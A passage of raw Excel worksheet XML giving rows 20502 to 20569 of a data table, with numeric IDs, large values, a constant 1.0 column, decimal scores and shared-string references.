      </c>
      <c r="C20502" s="2" t="s">
        <v>19777</v>
      </c>
      <c r="D20502" s="2">
        <v>1.0</v>
      </c>
      <c r="E20502" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20502" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20503" ht="15.75" customHeight="1">
      <c r="A20503" s="1">
        <v>11514.0</v>
      </c>
      <c r="B20503" s="2">
        <v>2.2306172E7</v>
      </c>
      <c r="C20503" s="2" t="s">
        <v>19778</v>
      </c>
      <c r="D20503" s="2">
        <v>1.0</v>
      </c>
      <c r="E20503" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20503" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20504" ht="15.75" customHeight="1">
      <c r="A20504" s="1">
        <v>11977.0</v>
      </c>
      <c r="B20504" s="2">
        <v>2.5791652E7</v>
      </c>
      <c r="C20504" s="2" t="s">
        <v>19779</v>
      </c>
      <c r="D20504" s="2">
        <v>1.0</v>
      </c>
      <c r="E20504" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20504" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20505" ht="15.75" customHeight="1">
      <c r="A20505" s="1">
        <v>12037.0</v>
      </c>
      <c r="B20505" s="2">
        <v>2.6296153E7</v>
      </c>
      <c r="C20505" s="2" t="s">
        <v>19780</v>
      </c>
      <c r="D20505" s="2">
        <v>1.0</v>
      </c>
      <c r="E20505" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20505" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20506" ht="15.75" customHeight="1">
      <c r="A20506" s="1">
        <v>12515.0</v>
      </c>
      <c r="B20506" s="2">
        <v>2.9661146E7</v>
      </c>
      <c r="C20506" s="2" t="s">
        <v>19781</v>
      </c>
      <c r="D20506" s="2">
        <v>1.0</v>
      </c>
      <c r="E20506" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20506" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20507" ht="15.75" customHeight="1">
      <c r="A20507" s="1">
        <v>13114.0</v>
      </c>
      <c r="B20507" s="2">
        <v>3.3582362E7</v>
      </c>
      <c r="C20507" s="2" t="s">
        <v>19782</v>
      </c>
      <c r="D20507" s="2">
        <v>1.0</v>
      </c>
      <c r="E20507" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20507" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20508" ht="15.75" customHeight="1">
      <c r="A20508" s="1">
        <v>13351.0</v>
      </c>
      <c r="B20508" s="2">
        <v>3.4734762E7</v>
      </c>
      <c r="C20508" s="2" t="s">
        <v>19783</v>
      </c>
      <c r="D20508" s="2">
        <v>1.0</v>
      </c>
      <c r="E20508" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20508" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20509" ht="15.75" customHeight="1">
      <c r="A20509" s="1">
        <v>13566.0</v>
      </c>
      <c r="B20509" s="2">
        <v>3.5699829E7</v>
      </c>
      <c r="C20509" s="2" t="s">
        <v>19784</v>
      </c>
      <c r="D20509" s="2">
        <v>1.0</v>
      </c>
      <c r="E20509" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20509" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20510" ht="15.75" customHeight="1">
      <c r="A20510" s="1">
        <v>13716.0</v>
      </c>
      <c r="B20510" s="2">
        <v>3.6310599E7</v>
      </c>
      <c r="C20510" s="2" t="s">
        <v>19785</v>
      </c>
      <c r="D20510" s="2">
        <v>1.0</v>
      </c>
      <c r="E20510" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20510" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20511" ht="15.75" customHeight="1">
      <c r="A20511" s="1">
        <v>13745.0</v>
      </c>
      <c r="B20511" s="2">
        <v>3.6465779E7</v>
      </c>
      <c r="C20511" s="2" t="s">
        <v>19786</v>
      </c>
      <c r="D20511" s="2">
        <v>1.0</v>
      </c>
      <c r="E20511" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20511" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20512" ht="15.75" customHeight="1">
      <c r="A20512" s="1">
        <v>14199.0</v>
      </c>
      <c r="B20512" s="2">
        <v>3.8233023E7</v>
      </c>
      <c r="C20512" s="2" t="s">
        <v>19787</v>
      </c>
      <c r="D20512" s="2">
        <v>1.0</v>
      </c>
      <c r="E20512" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20512" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20513" ht="15.75" customHeight="1">
      <c r="A20513" s="1">
        <v>14206.0</v>
      </c>
      <c r="B20513" s="2">
        <v>3.825096E7</v>
      </c>
      <c r="C20513" s="2" t="s">
        <v>19788</v>
      </c>
      <c r="D20513" s="2">
        <v>1.0</v>
      </c>
      <c r="E20513" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20513" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20514" ht="15.75" customHeight="1">
      <c r="A20514" s="1">
        <v>14354.0</v>
      </c>
      <c r="B20514" s="2">
        <v>3.892788E7</v>
      </c>
      <c r="C20514" s="2" t="s">
        <v>19789</v>
      </c>
      <c r="D20514" s="2">
        <v>1.0</v>
      </c>
      <c r="E20514" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20514" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20515" ht="15.75" customHeight="1">
      <c r="A20515" s="1">
        <v>14364.0</v>
      </c>
      <c r="B20515" s="2">
        <v>3.8951586E7</v>
      </c>
      <c r="C20515" s="2" t="s">
        <v>19790</v>
      </c>
      <c r="D20515" s="2">
        <v>1.0</v>
      </c>
      <c r="E20515" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20515" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20516" ht="15.75" customHeight="1">
      <c r="A20516" s="1">
        <v>14560.0</v>
      </c>
      <c r="B20516" s="2">
        <v>4.0035461E7</v>
      </c>
      <c r="C20516" s="2" t="s">
        <v>19791</v>
      </c>
      <c r="D20516" s="2">
        <v>1.0</v>
      </c>
      <c r="E20516" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20516" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20517" ht="15.75" customHeight="1">
      <c r="A20517" s="1">
        <v>14622.0</v>
      </c>
      <c r="B20517" s="2">
        <v>4.0293257E7</v>
      </c>
      <c r="C20517" s="2" t="s">
        <v>19792</v>
      </c>
      <c r="D20517" s="2">
        <v>1.0</v>
      </c>
      <c r="E20517" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20517" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20518" ht="15.75" customHeight="1">
      <c r="A20518" s="1">
        <v>15390.0</v>
      </c>
      <c r="B20518" s="2">
        <v>4.2793686E7</v>
      </c>
      <c r="C20518" s="2" t="s">
        <v>19793</v>
      </c>
      <c r="D20518" s="2">
        <v>1.0</v>
      </c>
      <c r="E20518" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20518" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20519" ht="15.75" customHeight="1">
      <c r="A20519" s="1">
        <v>15510.0</v>
      </c>
      <c r="B20519" s="2">
        <v>4.3254273E7</v>
      </c>
      <c r="C20519" s="2" t="s">
        <v>19794</v>
      </c>
      <c r="D20519" s="2">
        <v>1.0</v>
      </c>
      <c r="E20519" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20519" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20520" ht="15.75" customHeight="1">
      <c r="A20520" s="1">
        <v>15511.0</v>
      </c>
      <c r="B20520" s="2">
        <v>4.3254273E7</v>
      </c>
      <c r="C20520" s="2" t="s">
        <v>19795</v>
      </c>
      <c r="D20520" s="2">
        <v>1.0</v>
      </c>
      <c r="E20520" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20520" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20521" ht="15.75" customHeight="1">
      <c r="A20521" s="1">
        <v>15867.0</v>
      </c>
      <c r="B20521" s="2">
        <v>4.4501107E7</v>
      </c>
      <c r="C20521" s="2" t="s">
        <v>19796</v>
      </c>
      <c r="D20521" s="2">
        <v>1.0</v>
      </c>
      <c r="E20521" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20521" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20522" ht="15.75" customHeight="1">
      <c r="A20522" s="1">
        <v>16065.0</v>
      </c>
      <c r="B20522" s="2">
        <v>4.5306531E7</v>
      </c>
      <c r="C20522" s="2" t="s">
        <v>19797</v>
      </c>
      <c r="D20522" s="2">
        <v>1.0</v>
      </c>
      <c r="E20522" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20522" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20523" ht="15.75" customHeight="1">
      <c r="A20523" s="1">
        <v>16172.0</v>
      </c>
      <c r="B20523" s="2">
        <v>4.5642535E7</v>
      </c>
      <c r="C20523" s="2" t="s">
        <v>19798</v>
      </c>
      <c r="D20523" s="2">
        <v>1.0</v>
      </c>
      <c r="E20523" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20523" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20524" ht="15.75" customHeight="1">
      <c r="A20524" s="1">
        <v>16225.0</v>
      </c>
      <c r="B20524" s="2">
        <v>4.571591E7</v>
      </c>
      <c r="C20524" s="2" t="s">
        <v>19799</v>
      </c>
      <c r="D20524" s="2">
        <v>1.0</v>
      </c>
      <c r="E20524" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20524" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20525" ht="15.75" customHeight="1">
      <c r="A20525" s="1">
        <v>16336.0</v>
      </c>
      <c r="B20525" s="2">
        <v>4.604714E7</v>
      </c>
      <c r="C20525" s="2" t="s">
        <v>19800</v>
      </c>
      <c r="D20525" s="2">
        <v>1.0</v>
      </c>
      <c r="E20525" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20525" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20526" ht="15.75" customHeight="1">
      <c r="A20526" s="1">
        <v>16342.0</v>
      </c>
      <c r="B20526" s="2">
        <v>4.6061522E7</v>
      </c>
      <c r="C20526" s="2" t="s">
        <v>19801</v>
      </c>
      <c r="D20526" s="2">
        <v>1.0</v>
      </c>
      <c r="E20526" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20526" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20527" ht="15.75" customHeight="1">
      <c r="A20527" s="1">
        <v>16717.0</v>
      </c>
      <c r="B20527" s="2">
        <v>4.7449303E7</v>
      </c>
      <c r="C20527" s="2" t="s">
        <v>19802</v>
      </c>
      <c r="D20527" s="2">
        <v>1.0</v>
      </c>
      <c r="E20527" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20527" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20528" ht="15.75" customHeight="1">
      <c r="A20528" s="1">
        <v>17522.0</v>
      </c>
      <c r="B20528" s="2">
        <v>5.0091416E7</v>
      </c>
      <c r="C20528" s="2" t="s">
        <v>19803</v>
      </c>
      <c r="D20528" s="2">
        <v>1.0</v>
      </c>
      <c r="E20528" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20528" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20529" ht="15.75" customHeight="1">
      <c r="A20529" s="1">
        <v>17640.0</v>
      </c>
      <c r="B20529" s="2">
        <v>5.0401051E7</v>
      </c>
      <c r="C20529" s="2" t="s">
        <v>19804</v>
      </c>
      <c r="D20529" s="2">
        <v>1.0</v>
      </c>
      <c r="E20529" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20529" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20530" ht="15.75" customHeight="1">
      <c r="A20530" s="1">
        <v>18075.0</v>
      </c>
      <c r="B20530" s="2">
        <v>5.1622917E7</v>
      </c>
      <c r="C20530" s="2" t="s">
        <v>19805</v>
      </c>
      <c r="D20530" s="2">
        <v>1.0</v>
      </c>
      <c r="E20530" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20530" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20531" ht="15.75" customHeight="1">
      <c r="A20531" s="1">
        <v>18970.0</v>
      </c>
      <c r="B20531" s="2">
        <v>5.4374837E7</v>
      </c>
      <c r="C20531" s="2" t="s">
        <v>19806</v>
      </c>
      <c r="D20531" s="2">
        <v>1.0</v>
      </c>
      <c r="E20531" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20531" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20532" ht="15.75" customHeight="1">
      <c r="A20532" s="1">
        <v>19577.0</v>
      </c>
      <c r="B20532" s="2">
        <v>5.6151652E7</v>
      </c>
      <c r="C20532" s="2" t="s">
        <v>19807</v>
      </c>
      <c r="D20532" s="2">
        <v>1.0</v>
      </c>
      <c r="E20532" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20532" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20533" ht="15.75" customHeight="1">
      <c r="A20533" s="1">
        <v>19941.0</v>
      </c>
      <c r="B20533" s="2">
        <v>5.7455539E7</v>
      </c>
      <c r="C20533" s="2" t="s">
        <v>19808</v>
      </c>
      <c r="D20533" s="2">
        <v>1.0</v>
      </c>
      <c r="E20533" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20533" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20534" ht="15.75" customHeight="1">
      <c r="A20534" s="1">
        <v>26784.0</v>
      </c>
      <c r="B20534" s="2">
        <v>1.8558811E7</v>
      </c>
      <c r="C20534" s="2" t="s">
        <v>19809</v>
      </c>
      <c r="D20534" s="2">
        <v>1.0</v>
      </c>
      <c r="E20534" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20534" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20535" ht="15.75" customHeight="1">
      <c r="A20535" s="1">
        <v>29313.0</v>
      </c>
      <c r="B20535" s="2">
        <v>3.1284603E7</v>
      </c>
      <c r="C20535" s="2" t="s">
        <v>19810</v>
      </c>
      <c r="D20535" s="2">
        <v>1.0</v>
      </c>
      <c r="E20535" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20535" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20536" ht="15.75" customHeight="1">
      <c r="A20536" s="1">
        <v>29432.0</v>
      </c>
      <c r="B20536" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C20536" s="2" t="s">
        <v>19811</v>
      </c>
      <c r="D20536" s="2">
        <v>1.0</v>
      </c>
      <c r="E20536" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20536" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20537" ht="15.75" customHeight="1">
      <c r="A20537" s="1">
        <v>30541.0</v>
      </c>
      <c r="B20537" s="2">
        <v>4.0569463E7</v>
      </c>
      <c r="C20537" s="2" t="s">
        <v>19812</v>
      </c>
      <c r="D20537" s="2">
        <v>1.0</v>
      </c>
      <c r="E20537" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20537" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20538" ht="15.75" customHeight="1">
      <c r="A20538" s="1">
        <v>33695.0</v>
      </c>
      <c r="B20538" s="2">
        <v>8457000.0</v>
      </c>
      <c r="C20538" s="2" t="s">
        <v>19813</v>
      </c>
      <c r="D20538" s="2">
        <v>1.0</v>
      </c>
      <c r="E20538" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20538" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="20539" ht="15.75" customHeight="1">
      <c r="A20539" s="1">
        <v>4209.0</v>
      </c>
      <c r="B20539" s="2">
        <v>4.1686985E7</v>
      </c>
      <c r="C20539" s="2" t="s">
        <v>19814</v>
      </c>
      <c r="D20539" s="2">
        <v>1.0</v>
      </c>
      <c r="E20539" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20539" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="20540" ht="15.75" customHeight="1">
      <c r="A20540" s="1">
        <v>21631.0</v>
      </c>
      <c r="B20540" s="2">
        <v>2.4654859E7</v>
      </c>
      <c r="C20540" s="2" t="s">
        <v>19815</v>
      </c>
      <c r="D20540" s="2">
        <v>1.0</v>
      </c>
      <c r="E20540" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20540" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="20541" ht="15.75" customHeight="1">
      <c r="A20541" s="1">
        <v>28095.0</v>
      </c>
      <c r="B20541" s="2">
        <v>2.4654858E7</v>
      </c>
      <c r="C20541" s="2" t="s">
        <v>19816</v>
      </c>
      <c r="D20541" s="2">
        <v>1.0</v>
      </c>
      <c r="E20541" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20541" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="20542" ht="15.75" customHeight="1">
      <c r="A20542" s="1">
        <v>30265.0</v>
      </c>
      <c r="B20542" s="2">
        <v>3.765069E7</v>
      </c>
      <c r="C20542" s="2" t="s">
        <v>19817</v>
      </c>
      <c r="D20542" s="2">
        <v>1.0</v>
      </c>
      <c r="E20542" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20542" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="20543" ht="15.75" customHeight="1">
      <c r="A20543" s="1">
        <v>32275.0</v>
      </c>
      <c r="B20543" s="2">
        <v>5531658.0</v>
      </c>
      <c r="C20543" s="2" t="s">
        <v>19818</v>
      </c>
      <c r="D20543" s="2">
        <v>1.0</v>
      </c>
      <c r="E20543" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20543" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="20544" ht="15.75" customHeight="1">
      <c r="A20544" s="1">
        <v>18078.0</v>
      </c>
      <c r="B20544" s="2">
        <v>5.1622968E7</v>
      </c>
      <c r="C20544" s="2" t="s">
        <v>19819</v>
      </c>
      <c r="D20544" s="2">
        <v>1.0</v>
      </c>
      <c r="E20544" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20544" s="2">
        <v>0.1161616161616162</v>
      </c>
    </row>
    <row r="20545" ht="15.75" customHeight="1">
      <c r="A20545" s="1">
        <v>579.0</v>
      </c>
      <c r="B20545" s="2">
        <v>1.9113717E7</v>
      </c>
      <c r="C20545" s="2" t="s">
        <v>19820</v>
      </c>
      <c r="D20545" s="2">
        <v>1.0</v>
      </c>
      <c r="E20545" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20545" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="20546" ht="15.75" customHeight="1">
      <c r="A20546" s="1">
        <v>7071.0</v>
      </c>
      <c r="B20546" s="2">
        <v>5.0246549E7</v>
      </c>
      <c r="C20546" s="2" t="s">
        <v>19821</v>
      </c>
      <c r="D20546" s="2">
        <v>1.0</v>
      </c>
      <c r="E20546" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20546" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="20547" ht="15.75" customHeight="1">
      <c r="A20547" s="1">
        <v>11290.0</v>
      </c>
      <c r="B20547" s="2">
        <v>2.0907241E7</v>
      </c>
      <c r="C20547" s="2" t="s">
        <v>19822</v>
      </c>
      <c r="D20547" s="2">
        <v>1.0</v>
      </c>
      <c r="E20547" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20547" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="20548" ht="15.75" customHeight="1">
      <c r="A20548" s="1">
        <v>13178.0</v>
      </c>
      <c r="B20548" s="2">
        <v>3.4012539E7</v>
      </c>
      <c r="C20548" s="2" t="s">
        <v>19823</v>
      </c>
      <c r="D20548" s="2">
        <v>1.0</v>
      </c>
      <c r="E20548" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20548" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="20549" ht="15.75" customHeight="1">
      <c r="A20549" s="1">
        <v>1522.0</v>
      </c>
      <c r="B20549" s="2">
        <v>2.7407385E7</v>
      </c>
      <c r="C20549" s="2" t="s">
        <v>19824</v>
      </c>
      <c r="D20549" s="2">
        <v>1.0</v>
      </c>
      <c r="E20549" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20549" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="20550" ht="15.75" customHeight="1">
      <c r="A20550" s="1">
        <v>5081.0</v>
      </c>
      <c r="B20550" s="2">
        <v>4.4461046E7</v>
      </c>
      <c r="C20550" s="2" t="s">
        <v>19825</v>
      </c>
      <c r="D20550" s="2">
        <v>1.0</v>
      </c>
      <c r="E20550" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20550" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="20551" ht="15.75" customHeight="1">
      <c r="A20551" s="1">
        <v>5288.0</v>
      </c>
      <c r="B20551" s="2">
        <v>4.519281E7</v>
      </c>
      <c r="C20551" s="2" t="s">
        <v>19826</v>
      </c>
      <c r="D20551" s="2">
        <v>1.0</v>
      </c>
      <c r="E20551" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20551" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="20552" ht="15.75" customHeight="1">
      <c r="A20552" s="1">
        <v>1617.0</v>
      </c>
      <c r="B20552" s="2">
        <v>2.7845536E7</v>
      </c>
      <c r="C20552" s="2" t="s">
        <v>19827</v>
      </c>
      <c r="D20552" s="2">
        <v>1.0</v>
      </c>
      <c r="E20552" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20552" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="20553" ht="15.75" customHeight="1">
      <c r="A20553" s="1">
        <v>3409.0</v>
      </c>
      <c r="B20553" s="2">
        <v>3.8052032E7</v>
      </c>
      <c r="C20553" s="2" t="s">
        <v>19828</v>
      </c>
      <c r="D20553" s="2">
        <v>1.0</v>
      </c>
      <c r="E20553" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20553" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="20554" ht="15.75" customHeight="1">
      <c r="A20554" s="1">
        <v>7841.0</v>
      </c>
      <c r="B20554" s="2">
        <v>5.23269E7</v>
      </c>
      <c r="C20554" s="2" t="s">
        <v>19829</v>
      </c>
      <c r="D20554" s="2">
        <v>1.0</v>
      </c>
      <c r="E20554" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20554" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="20555" ht="15.75" customHeight="1">
      <c r="A20555" s="1">
        <v>605.0</v>
      </c>
      <c r="B20555" s="2">
        <v>1.9374865E7</v>
      </c>
      <c r="C20555" s="2" t="s">
        <v>19830</v>
      </c>
      <c r="D20555" s="2">
        <v>1.0</v>
      </c>
      <c r="E20555" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20555" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20556" ht="15.75" customHeight="1">
      <c r="A20556" s="1">
        <v>3730.0</v>
      </c>
      <c r="B20556" s="2">
        <v>3.9632455E7</v>
      </c>
      <c r="C20556" s="2" t="s">
        <v>19831</v>
      </c>
      <c r="D20556" s="2">
        <v>1.0</v>
      </c>
      <c r="E20556" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20556" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20557" ht="15.75" customHeight="1">
      <c r="A20557" s="1">
        <v>4037.0</v>
      </c>
      <c r="B20557" s="2">
        <v>4.1039924E7</v>
      </c>
      <c r="C20557" s="2" t="s">
        <v>19832</v>
      </c>
      <c r="D20557" s="2">
        <v>1.0</v>
      </c>
      <c r="E20557" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20557" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20558" ht="15.75" customHeight="1">
      <c r="A20558" s="1">
        <v>7062.0</v>
      </c>
      <c r="B20558" s="2">
        <v>5.022401E7</v>
      </c>
      <c r="C20558" s="2" t="s">
        <v>19833</v>
      </c>
      <c r="D20558" s="2">
        <v>1.0</v>
      </c>
      <c r="E20558" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20558" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20559" ht="15.75" customHeight="1">
      <c r="A20559" s="1">
        <v>14746.0</v>
      </c>
      <c r="B20559" s="2">
        <v>4.0725435E7</v>
      </c>
      <c r="C20559" s="2" t="s">
        <v>19834</v>
      </c>
      <c r="D20559" s="2">
        <v>1.0</v>
      </c>
      <c r="E20559" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20559" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20560" ht="15.75" customHeight="1">
      <c r="A20560" s="1">
        <v>15184.0</v>
      </c>
      <c r="B20560" s="2">
        <v>4.2030494E7</v>
      </c>
      <c r="C20560" s="2" t="s">
        <v>19835</v>
      </c>
      <c r="D20560" s="2">
        <v>1.0</v>
      </c>
      <c r="E20560" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20560" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="20561" ht="15.75" customHeight="1">
      <c r="A20561" s="1">
        <v>18102.0</v>
      </c>
      <c r="B20561" s="2">
        <v>5.1719672E7</v>
      </c>
      <c r="C20561" s="2" t="s">
        <v>19836</v>
      </c>
      <c r="D20561" s="2">
        <v>1.0</v>
      </c>
      <c r="E20561" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20561" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="20562" ht="15.75" customHeight="1">
      <c r="A20562" s="1">
        <v>30136.0</v>
      </c>
      <c r="B20562" s="2">
        <v>3.703616E7</v>
      </c>
      <c r="C20562" s="2" t="s">
        <v>19837</v>
      </c>
      <c r="D20562" s="2">
        <v>1.0</v>
      </c>
      <c r="E20562" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20562" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="20563" ht="15.75" customHeight="1">
      <c r="A20563" s="1">
        <v>33056.0</v>
      </c>
      <c r="B20563" s="2">
        <v>6812015.0</v>
      </c>
      <c r="C20563" s="2" t="s">
        <v>19838</v>
      </c>
      <c r="D20563" s="2">
        <v>1.0</v>
      </c>
      <c r="E20563" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20563" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="20564" ht="15.75" customHeight="1">
      <c r="A20564" s="1">
        <v>3383.0</v>
      </c>
      <c r="B20564" s="2">
        <v>3.7950485E7</v>
      </c>
      <c r="C20564" s="2" t="s">
        <v>19839</v>
      </c>
      <c r="D20564" s="2">
        <v>1.0</v>
      </c>
      <c r="E20564" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20564" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="20565" ht="15.75" customHeight="1">
      <c r="A20565" s="1">
        <v>3466.0</v>
      </c>
      <c r="B20565" s="2">
        <v>3.8339304E7</v>
      </c>
      <c r="C20565" s="2" t="s">
        <v>19840</v>
      </c>
      <c r="D20565" s="2">
        <v>1.0</v>
      </c>
      <c r="E20565" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20565" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="20566" ht="15.75" customHeight="1">
      <c r="A20566" s="1">
        <v>16648.0</v>
      </c>
      <c r="B20566" s="2">
        <v>4.7174926E7</v>
      </c>
      <c r="C20566" s="2" t="s">
        <v>19841</v>
      </c>
      <c r="D20566" s="2">
        <v>1.0</v>
      </c>
      <c r="E20566" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20566" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="20567" ht="15.75" customHeight="1">
      <c r="A20567" s="1">
        <v>17952.0</v>
      </c>
      <c r="B20567" s="2">
        <v>5.1258173E7</v>
      </c>
      <c r="C20567" s="2" t="s">
        <v>19842</v>
      </c>
      <c r="D20567" s="2">
        <v>1.0</v>
      </c>
      <c r="E20567" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20567" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="20568" ht="15.75" customHeight="1">
      <c r="A20568" s="1">
        <v>24724.0</v>
      </c>
      <c r="B20568" s="2">
        <v>1.1712052E7</v>
      </c>
      <c r="C20568" s="2" t="s">
        <v>19843</v>
      </c>
      <c r="D20568" s="2">
        <v>1.0</v>
      </c>
      <c r="E20568" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20568" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="20569" ht="15.75" customHeight="1">
      <c r="A20569" s="1">
        <v>1001.0</v>
      </c>
      <c r="B20569" s="2">
        <v>2.2966661E7</v>
      </c>
